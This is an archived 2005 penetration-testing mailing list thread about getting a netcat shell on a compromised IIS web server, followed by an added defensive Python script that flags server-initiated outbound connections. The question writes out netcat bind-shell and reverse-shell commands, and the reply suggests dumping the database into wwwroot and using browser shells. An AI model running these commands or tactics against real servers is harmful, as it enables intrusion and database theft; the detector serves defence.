Penetration Testing mailing list archives

RE: Netcat Question


From: Meidinger Chris <chris.meidinger () badenit de>
Date: Wed, 1 Jun 2005 15:43:39 +0200

Hi Intel,

I assume there is a firewall between you and the webserver? That would be
a pretty logical explanation of why you can't access your bindshell.

If I were you, I would upload a script, have that script run locally to dump
the database and place the results in a folder in wwwroot. Then you can pick
it up with your browser.

If you want to get tricky, you should find a couple of .NET applications
that act as browser shells.

But remember: unless you are combined testing incident response and
penetration you *don't* want to trip IDS. Outbound connections from a web
server to a silly internet host on port 8000(!) are a dead giveaway for a
properly tuned IDS or a decent firewall admin. Don't be surprised if you get
blackholed.

Cheers,

Chris


-----Original Message-----
From: intel96 [mailto:intel96 () bellsouth net] 
Sent: Wednesday, June 01, 2005 12:39 AM
To: pen-test () securityfocus com
Subject: Netcat Question

To All,

I am conducting a pentest and I have been able to upload netcat to the
web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to
establish a shell both ways, but cannot get it to work:

On the web server I first tried: nc.exe -l -p 8000 -e cmd.exe

When I tried to connect to port 8000 on the web server I received a
timeout on my side. I have also tried this with port 53 and it also did
not work.

I then tried: nc.exe -nv my_public_ip_address 443 -d -e cmd.exe

This did not work either. I did not see the remote system trying to
connect to my system via my logs. I have access to upload anything to
the system and run most commands via sql injections. I have
administrator level access on the system at this time.

Any ideas on how I can get this shell to work? Or are there any other
commands that may provide me more access or allow me to dump the
database?

Thanks,

Intel96
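
Added example, not part of the original thread: a small Python detector for the IDS point made in the reply above. It keys on which side sent the initial SYN rather than on the port number, so a web server opening a connection to an external host on 443 is flagged just like one on 8000. The server address, internal range, egress allowlist and log layout are all constructed assumptions.

```python
import ipaddress

# Assumptions (all constructed for this example): the web server address,
# the internal ranges, the egress allowlist, and the log layout
# "time proto src_ip src_port dst_ip dst_port tcp_flags".
WEB_SERVERS = {ipaddress.ip_address("10.0.5.20")}
INTERNAL = [ipaddress.ip_network("10.0.0.0/8")]
ALLOWED_EGRESS = {(ipaddress.ip_address("198.51.100.10"), 443)}  # approved update host

SAMPLE_LOG = """\
2005-06-01T12:00:01 tcp 203.0.113.7 51515 10.0.5.20 80 S
2005-06-01T12:00:01 tcp 10.0.5.20 80 203.0.113.7 51515 SA
2005-06-01T12:03:10 tcp 10.0.5.20 1042 203.0.113.99 8000 S
2005-06-01T12:04:22 tcp 10.0.5.20 1043 203.0.113.99 443 S
2005-06-01T12:05:00 tcp 10.0.5.20 1044 198.51.100.10 443 S
2005-06-01T12:06:00 tcp 10.0.5.20 1045 10.0.9.3 1433 S
"""

def server_initiated_egress(log_text):
    """Return (time, dst_ip, dst_port) for each unapproved outbound
    connection that a web server itself opened to an external host."""
    alerts = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue  # skip lines that do not match the assumed layout
        ts, proto, src, _sport, dst, dport, flags = fields
        if proto != "tcp" or flags != "S":
            continue  # only a bare SYN shows who opened the connection
        src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        if src_ip not in WEB_SERVERS:
            continue  # inbound client requests are normal traffic
        if any(dst_ip in net for net in INTERNAL):
            continue  # internal back-end traffic is out of scope here
        if (dst_ip, int(dport)) in ALLOWED_EGRESS:
            continue  # explicitly approved egress
        alerts.append((ts, dst, int(dport)))
    return alerts

if __name__ == "__main__":
    for alert in server_initiated_egress(SAMPLE_LOG):
        print("ALERT server-initiated egress:", *alert)
```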




